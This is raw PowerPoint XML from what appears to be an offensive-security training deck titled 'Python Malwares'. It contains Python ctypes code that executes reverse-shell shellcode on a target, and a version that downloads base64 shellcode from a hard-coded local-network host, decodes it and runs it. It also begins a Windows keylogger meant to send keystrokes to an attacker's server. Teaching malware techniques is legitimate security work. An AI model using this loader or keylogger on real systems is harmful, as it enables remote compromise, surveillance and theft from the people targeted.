                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1350" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ctypes.windll.kernel32.WaitForSingleObject(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.c_void_p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ctypes.c_uint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__name__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__main__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26779962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196386" y="177296"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares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66588" y="1218206"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Running Shellcode With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ctypes</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121</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08171" y="1728207"/>
            <a:ext cx="4165145" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we execute this script on the target with the reverse shell shellcode we generated, we should get a shell!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BEC03B-16B8-4EE5-AEE8-93F5E6D3F9CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639504" y="2859749"/>
            <a:ext cx="2622880" cy="3000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350" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python shellcode1.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E84FB34-DC1B-4BDD-A57F-D463D9D8DF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3716" y="1719368"/>
            <a:ext cx="6203673" cy="5121330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40599572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196386" y="177296"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares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38514" y="1382742"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Running Shellcode With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ctypes</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122</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20203" y="1908681"/>
            <a:ext cx="9118145" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can modify our script to execute a shellcode obtained through the network instead of embedding the shellcode in the script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3810EE-94AE-4738-9B2B-FEF7D3373B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680413" y="2683559"/>
            <a:ext cx="9821776"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ctypes</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base64</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time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sleep</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urllib</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request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URL = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://192.168.10.179:8000/shellcode.b64"</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F97EF55B-EE73-4F2B-ACBA-3C0A229D3FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920203" y="4690428"/>
            <a:ext cx="9118145" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our function that obtains the shellcode and decodes it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3EAC72-941F-4423-B406-179B1D3E9C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680413" y="5025709"/>
            <a:ext cx="9821776"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get_shellcode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URL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request.urlopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(URL)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response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            shellcode = base64.decodebytes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response.read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None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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16324201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196386" y="177296"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Python Malwares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38514" y="1382742"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Running Shellcode With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ctypes</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123</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20203" y="1908681"/>
            <a:ext cx="9118145"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modify our main function to execute only if the shellcode is obtained</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3810EE-94AE-4738-9B2B-FEF7D3373B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680413" y="2683559"/>
            <a:ext cx="9821776"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(shellcode := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(URL)) ==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 sleep(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>60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EDBA64C4-23F3-46E0-A571-140963097EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070809" y="3799710"/>
            <a:ext cx="10319086" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our script obtains the shellcode from the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>http://192.168.10.179:8000/shellcode.b64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, decodes it, and finally executes it.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Once we run the script, we get a reverse shell as expected.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4949959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 this section, we will write a keylogger on Windows that will exfiltrate user keystrokes from the target to the attacker’s server.</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we will need to install the following dependencies:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E81C5B7-A97F-49D3-9736-F05C8BFD5045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572680" y="3331022"/>
            <a:ext cx="9372047" cy="27699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pip install pywin32 requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19737BF-CD93-4534-8CDD-47099E69DE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139940" y="3741640"/>
            <a:ext cx="8717933" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>There’s one special dependency </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>pyWinhook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> that will require further work to install.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D16A9AE-B93F-45A9-ADEB-952A227EBBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21761903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First, we will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>swig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pyWinhook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>requires to connect with its C part.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E86EA10-0785-467D-A5C6-BE7DF1089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678" y="2451120"/>
            <a:ext cx="9198643" cy="2733487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B446FD4-CE68-4E0B-B322-68A477CBBC81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606716" y="4335379"/>
            <a:ext cx="1864895" cy="43313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extBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E163C0E6-35AA-41EF-827B-8D7EBF8D4852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="5322799"/>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direct link to download the dependency is located </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A1E6F8-F83E-4634-AAB0-53875E09F5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D20D7AB-45B3-43F7-869E-066D72A45945}"/>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31329309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downloaded, we will unzip it, and add the folder that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>swig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is located to our environment variables:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Table&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8094D1E5-4904-42C1-80C7-163398AF5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270" y="2783803"/>
            <a:ext cx="8295457" cy="3859897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3467951B-35C1-42E9-8807-3C125ABD1AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD4AF72-96D5-4379-BFA2-75C2622B2BF3}"/>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8921642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downloaded, we will unzip it, and add the folder that </a:t>
            </a:r>
            <a:r>
